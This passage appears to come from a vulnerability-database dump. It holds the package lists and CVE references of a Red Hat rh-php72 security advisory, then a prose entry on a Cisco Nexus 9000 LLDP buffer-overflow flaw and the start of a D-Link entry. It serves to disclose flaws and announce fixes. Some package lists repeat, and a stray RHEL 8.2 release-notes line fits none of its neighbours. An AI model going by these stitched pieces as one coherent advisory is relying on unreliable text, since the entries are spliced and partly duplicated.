rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm
s390x:
rh-php72-php-7.2.24-1.el7.s390x.rpm
rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm
rh-php72-php-cli-7.2.24-1.el7.s390x.rpm
rh-php72-php-common-7.2.24-1.el7.s390x.rpm
rh-php72-php-dba-7.2.24-1.el7.s390x.rpm
rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm
rh-php72-php-devel-7.2.24-1.el7.s390x.rpm
rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm
rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm
rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm
rh-php72-php-gd-7.2.24-1.el7.s390x.rpm
rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-intl-7.2.24-1.el7.s390x.rpm
rh-php72-php-json-7.2.24-1.el7.s390x.rpm
rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm
rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm
rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm
rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm
rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm
rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm
rh-php72-php-process-7.2.24-1.el7.s390x.rpm
rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm
rh-php72-php-recode-7.2.24-1.el7.s390x.rpm
rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-soap-7.2.24-1.el7.s390x.rpm
rh-php72-php-xml-7.2.24-1.el7.s390x.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm
rh-php72-php-zip-7.2.24-1.el7.s390x.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm
s390x:
rh-php72-php-7.2.24-1.el7.s390x.rpm
rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm
rh-php72-php-cli-7.2.24-1.el7.s390x.rpm
rh-php72-php-common-7.2.24-1.el7.s390x.rpm
rh-php72-php-dba-7.2.24-1.el7.s390x.rpm
rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm
rh-php72-php-devel-7.2.24-1.el7.s390x.rpm
rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm
rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm
rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm
rh-php72-php-gd-7.2.24-1.el7.s390x.rpm
rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-intl-7.2.24-1.el7.s390x.rpm
rh-php72-php-json-7.2.24-1.el7.s390x.rpm
rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm
rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm
rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm
rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm
rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm
rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm
rh-php72-php-process-7.2.24-1.el7.s390x.rpm
rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm
rh-php72-php-recode-7.2.24-1.el7.s390x.rpm
rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-soap-7.2.24-1.el7.s390x.rpm
rh-php72-php-xml-7.2.24-1.el7.s390x.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm
rh-php72-php-zip-7.2.24-1.el7.s390x.rpm
x86_64:
rh-php72-php-7.2.24-1.el7.x86_64.rpm
rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm
rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm
rh-php72-php-common-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm
rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm
rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm
rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm
rh-php72-php-json-7.2.24-1.el7.x86_64.rpm
rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm
rh-php72-php-process-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm
rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm
rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):
Source:
rh-php72-php-7.2.24-1.el7.src.rpm
ppc64le:
rh-php72-php-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm
s390x:
rh-php72-php-7.2.24-1.el7.s390x.rpm
rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm
rh-php72-php-cli-7.2.24-1.el7.s390x.rpm
rh-php72-php-common-7.2.24-1.el7.s390x.rpm
rh-php72-php-dba-7.2.24-1.el7.s390x.rpm
rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm
rh-php72-php-devel-7.2.24-1.el7.s390x.rpm
rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm
rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm
rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm
rh-php72-php-gd-7.2.24-1.el7.s390x.rpm
rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-intl-7.2.24-1.el7.s390x.rpm
rh-php72-php-json-7.2.24-1.el7.s390x.rpm
rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm
rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm
rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm
rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm
rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm
rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm
rh-php72-php-process-7.2.24-1.el7.s390x.rpm
rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm
rh-php72-php-recode-7.2.24-1.el7.s390x.rpm
rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-soap-7.2.24-1.el7.s390x.rpm
rh-php72-php-xml-7.2.24-1.el7.s390x.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm
rh-php72-php-zip-7.2.24-1.el7.s390x.rpm
x86_64:
rh-php72-php-7.2.24-1.el7.x86_64.rpm
rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm
rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm
rh-php72-php-common-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm
rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm
rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm
rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm
rh-php72-php-json-7.2.24-1.el7.x86_64.rpm
rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm
rh-php72-php-process-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm
rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm
rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):
Source:
rh-php72-php-7.2.24-1.el7.src.rpm
ppc64le:
rh-php72-php-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm
s390x:
rh-php72-php-7.2.24-1.el7.s390x.rpm
rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm
rh-php72-php-cli-7.2.24-1.el7.s390x.rpm
rh-php72-php-common-7.2.24-1.el7.s390x.rpm
rh-php72-php-dba-7.2.24-1.el7.s390x.rpm
rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm
rh-php72-php-devel-7.2.24-1.el7.s390x.rpm
rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm
rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm
rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm
rh-php72-php-gd-7.2.24-1.el7.s390x.rpm
rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-intl-7.2.24-1.el7.s390x.rpm
rh-php72-php-json-7.2.24-1.el7.s390x.rpm
rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm
rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm
rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm
rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm
rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm
rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm
rh-php72-php-process-7.2.24-1.el7.s390x.rpm
rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm
rh-php72-php-recode-7.2.24-1.el7.s390x.rpm
rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-soap-7.2.24-1.el7.s390x.rpm
rh-php72-php-xml-7.2.24-1.el7.s390x.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm
rh-php72-php-zip-7.2.24-1.el7.s390x.rpm
x86_64:
rh-php72-php-7.2.24-1.el7.x86_64.rpm
rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm
rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm
rh-php72-php-common-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm
rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm
rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm
rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm
rh-php72-php-json-7.2.24-1.el7.x86_64.rpm
rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm
rh-php72-php-process-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm
rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm
rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):
Source:
rh-php72-php-7.2.24-1.el7.src.rpm
ppc64le:
rh-php72-php-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm
rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm
s390x:
rh-php72-php-7.2.24-1.el7.s390x.rpm
rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm
rh-php72-php-cli-7.2.24-1.el7.s390x.rpm
rh-php72-php-common-7.2.24-1.el7.s390x.rpm
rh-php72-php-dba-7.2.24-1.el7.s390x.rpm
rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm
rh-php72-php-devel-7.2.24-1.el7.s390x.rpm
rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm
rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm
rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm
rh-php72-php-gd-7.2.24-1.el7.s390x.rpm
rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-intl-7.2.24-1.el7.s390x.rpm
rh-php72-php-json-7.2.24-1.el7.s390x.rpm
rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm
rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm
rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm
rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm
rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm
rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm
rh-php72-php-process-7.2.24-1.el7.s390x.rpm
rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm
rh-php72-php-recode-7.2.24-1.el7.s390x.rpm
rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm
rh-php72-php-soap-7.2.24-1.el7.s390x.rpm
rh-php72-php-xml-7.2.24-1.el7.s390x.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm
rh-php72-php-zip-7.2.24-1.el7.s390x.rpm
x86_64:
rh-php72-php-7.2.24-1.el7.x86_64.rpm
rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm
rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm
rh-php72-php-common-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm
rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm
rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm
rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm
rh-php72-php-json-7.2.24-1.el7.x86_64.rpm
rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm
rh-php72-php-process-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm
rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm
rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-php72-php-7.2.24-1.el7.src.rpm
x86_64:
rh-php72-php-7.2.24-1.el7.x86_64.rpm
rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm
rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm
rh-php72-php-common-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm
rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm
rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm
rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm
rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm
rh-php72-php-json-7.2.24-1.el7.x86_64.rpm
rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm
rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm
rh-php72-php-process-7.2.24-1.el7.x86_64.rpm
rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm
rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm
rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm
rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm
rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2016-10166
https://access.redhat.com/security/cve/CVE-2018-20783
https://access.redhat.com/security/cve/CVE-2019-6977
https://access.redhat.com/security/cve/CVE-2019-9020
https://access.redhat.com/security/cve/CVE-2019-9021
https://access.redhat.com/security/cve/CVE-2019-9022
https://access.redhat.com/security/cve/CVE-2019-9023
https://access.redhat.com/security/cve/CVE-2019-9024
https://access.redhat.com/security/cve/CVE-2019-9637
https://access.redhat.com/security/cve/CVE-2019-9638
https://access.redhat.com/security/cve/CVE-2019-9639
https://access.redhat.com/security/cve/CVE-2019-9640
https://access.redhat.com/security/cve/CVE-2019-11034
https://access.redhat.com/security/cve/CVE-2019-11035
https://access.redhat.com/security/cve/CVE-2019-11036
https://access.redhat.com/security/cve/CVE-2019-11038
https://access.redhat.com/security/cve/CVE-2019-11039
https://access.redhat.com/security/cve/CVE-2019-11040
https://access.redhat.com/security/cve/CVE-2019-11041
https://access.redhat.com/security/cve/CVE-2019-11042
https://access.redhat.com/security/cve/CVE-2019-11043
https://access.redhat.com/security/updates/classification/#critical
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.2 Release Notes linked from the References section
| VAR-201907-0859 | CVE-2019-1901 | Cisco Nexus 9000 Series Application Centric Infrastructure Mode Switch Software buffer error vulnerability |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the Link Layer Discovery Protocol (LLDP) subsystem of Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an adjacent, unauthenticated attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges. The vulnerability is due to improper input validation of certain type, length, value (TLV) fields of the LLDP frame header. An attacker could exploit this vulnerability by sending a crafted LLDP packet to the targeted device. A successful exploit may lead to a buffer overflow condition that could either cause a DoS condition or allow the attacker to execute arbitrary code with root privileges. Note: This vulnerability cannot be exploited by transit traffic through the device; the crafted packet must be targeted to a directly connected interface. This vulnerability affects Cisco Nexus 9000 Series Fabric Switches in ACI mode if they are running a Cisco Nexus 9000 Series ACI Mode Switch Software release prior to 13.2(7f) or any 14.x release
| VAR-201908-0910 | CVE-2019-14332 | D-Link 6600-AP and DWL-3600AP Vulnerability related to cryptographic strength in devices |
